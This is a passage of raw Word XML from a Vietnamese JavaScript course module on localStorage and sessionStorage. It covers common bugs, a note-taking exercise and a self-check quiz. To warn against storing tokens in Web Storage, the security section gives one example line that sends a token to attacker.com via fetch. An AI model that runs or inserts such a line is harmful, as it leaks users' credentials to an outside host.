        <w:t>Trong quy trình làm bài thi trắc nghiệm trực tuyến kéo dài 60 phút, lập trình viên sử dụng sessionStorage để lưu danh sách các câu trả lời đã tích chọn. Nếu thí sinh mở thêm một tab khác để tra cứu, tab mới không can thiệp vào bài thi. Khi thí sinh hoàn thành bài thi và đóng tab, toàn bộ dữ liệu phiên làm bài thi tự động biến mất hoàn toàn, giải phóng bộ nhớ máy khách.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451C34D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Lỗi thường gặp &amp; cách debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBE26CF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 1: Lưu trực tiếp Object khiến dữ liệu biến thành chuỗi "[object Object]":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE391C3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Viết mã: localStorage.setItem('user', { id: 1, name: 'Tuan' }). Khi mở tab Application trong DevTools ra kiểm tra, giá trị cột Value hiển thị dòng chữ vô nghĩa: "[object Object]". Khi đọc ra bằng JSON.parse(), chương trình bị crash ngay lập tức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BD962" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Luôn bọc qua hàm tuần tự hóa: localStorage.setItem('user', JSON.stringify(userObject)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF3B86" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 2: Lưu trữ Dữ liệu Nhạy cảm dẫn đến thảm họa bảo mật XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B62FC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Lưu trữ Mật khẩu người dùng, Số thẻ tín dụng, hoặc các mã nhạy cảm như JWT Refresh Token vào localStorage. Bất kỳ đoạn mã JavaScript độc hại nào vô tình lọt vào trang (qua thư viện bên thứ ba nhiễm mã độc hoặc lỗ hổng XSS) đều có thể đọc trọn vẹn dữ liệu này bằng đúng 1 dòng lệnh: fetch('https://attacker.com?leak=' + localStorage.getItem('token')).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A615F8C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Tuyệt đối không lưu dữ liệu nhạy cảm hoặc bí mật xác thực quan trọng trong Web Storage. Với Token xác thực đăng nhập, giải pháp chuẩn ngành là sử dụng HttpOnly Cookie được cấp phát từ Backend (JavaScript hoàn toàn bị cấm truy cập vào Cookie này).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B5D65" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 3: Không bọc JSON.parse() trong khối try...catch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175AB5E0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Người dùng tò mò mở DevTools sửa tay giá trị trong LocalStorage thành một chuỗi văn bản sai chuẩn JSON (ví dụ chữ: abc). Khi mở lại trang web, lệnh JSON.parse(localStorage.getItem('key')) ném ra ngoại lệ SyntaxError, làm toàn bộ mã JavaScript phía sau ngừng chạy, trang web bị trắng xóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFFFF1C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Luôn xây dựng hàm bọc có khối try...catch an toàn khi parse dữ liệu từ Web Storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EA9982" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bài tập thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330FDCE1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đề bài:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Xây dựng một ứng dụng Sổ tay Ghi chú Cá nhân (Quick Notes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0299769D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Một khung soạn thảo &lt;textarea&gt; và một nút "Lưu ghi chú".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54681477" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Bên dưới hiển thị danh sách các ghi chú đã lưu kèm thời gian tạo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E5F240" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Toàn bộ danh sách ghi chú được lưu bền vững trong localStorage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8B43A4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Mỗi ghi chú có một nút "Xóa" để loại bỏ ghi chú đó khỏi mảng dữ liệu trong storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AE9B81" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiêu chí nghiệm thu (Acceptance Criteria):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D909527" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Dữ liệu ghi chú được lưu dưới dạng một mảng các đối tượng: [{ id: 1718000000, content: '...', createdAt: '...' }].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6EB96" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Bắt buộc sử dụng JSON.stringify() và JSON.parse() có xử lý try...catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A789AFB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi tắt trình duyệt và mở lại trang web, toàn bộ danh sách ghi chú cũ vẫn hiển thị nguyên vẹn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDE5F95" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Checklist kiến thức Module 4 (Self-Check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3105AD26" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Hãy tự kiểm tra mức độ làm chủ kiến thức của bạn qua các câu hỏi kỹ thuật dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0525D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Phân biệt sự khác nhau giữa một Node và một Element trên cây DOM. Thuộc tính children và childNodes khác nhau ở điểm nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF47F2B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Tại sao document.querySelectorAll() trả về một </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static NodeList</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">, trong khi document.getElementsByClassName() lại trả về một </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Live HTMLCollection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t>? Điều này ảnh hưởng thế nào đến hiệu năng và tính logic khi thao tác mảng?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF761B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Tại sao việc liên tục đọc và ghi vào cây DOM bằng thuộc tính innerHTML lại gây ra vấn đề nghiêm trọng về hiệu năng (Reflow/Repaint) và rủi ro bảo mật (XSS)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7922A96B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Trình bày chi tiết 3 giai đoạn của chu trình lan truyền sự kiện (Event Propagation). Tại sao phương thức addEventListener mặc định lại bỏ qua giai đoạn Capturing?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CA763E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Kỹ thuật </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event Delegation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> vận hành dựa trên cơ chế nào của trình duyệt? Trong trường hợp nút bấm chứa một thẻ &lt;svg&gt; bên trong, làm thế nào để đảm bảo bạn luôn bắt trúng phần tử nút cha khi click?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F26F27B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi gọi fetch(), điều gì xảy ra nếu máy chủ trả về mã trạng thái HTTP 404 Not Found hoặc 500 Internal Server Error? Khối .catch() có tự động được kích hoạt không?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643116DF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Sự khác biệt cốt lõi về vòng đời (lifecycle) và phạm vi chia sẻ giữa </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LocalStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SessionStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A476013" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Tại sao việc lưu trữ JWT Access Token trong localStorage lại bị các chuyên gia bảo mật cảnh báo rủi ro cao? Giải pháp thay thế chuẩn công nghiệp là gì?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B47941" w14:textId="77777777" w:rsidR="00F15A8D" w:rsidRPr="00D366A7" w:rsidRDefault="00F15A8D" w:rsidP="00D366A7"/>
    <w:sectPr w:rsidR="00F15A8D" w:rsidRPr="00D366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EDF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA3C1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177B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BA2D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801BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A31604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2BDA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CDCD4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D0026"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C33683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155BA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2AFEE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A46B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="402A14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7915E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8946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B4211"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C1AA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9C598E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B34633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982823"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C04325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EA2D66"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE6A4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B9591D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0436E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23CBF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6882D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41492B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59686CE0"/>
    <w:lvl w:ilvl="0" w:tplc="5166240A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="18A241E0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B0D695BA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="799E0DE8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CECE6EA6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="651E878A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2384F752" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="887C745C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4E884E5A"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A2128"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7D1E5E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527D05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFBCE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A55BEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="338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FA1110"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DC6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E541D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90766850"/>
    <w:lvl w:ilvl="0" w:tplc="632E6A8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FCFC1C9C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="E252EFE6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FC1432DE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E10898DA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="792625DE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FDC62BDA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="BEB6C16A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="92C8B0DE"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5158E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="187461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2B63BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CC4C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D75AC6"/>
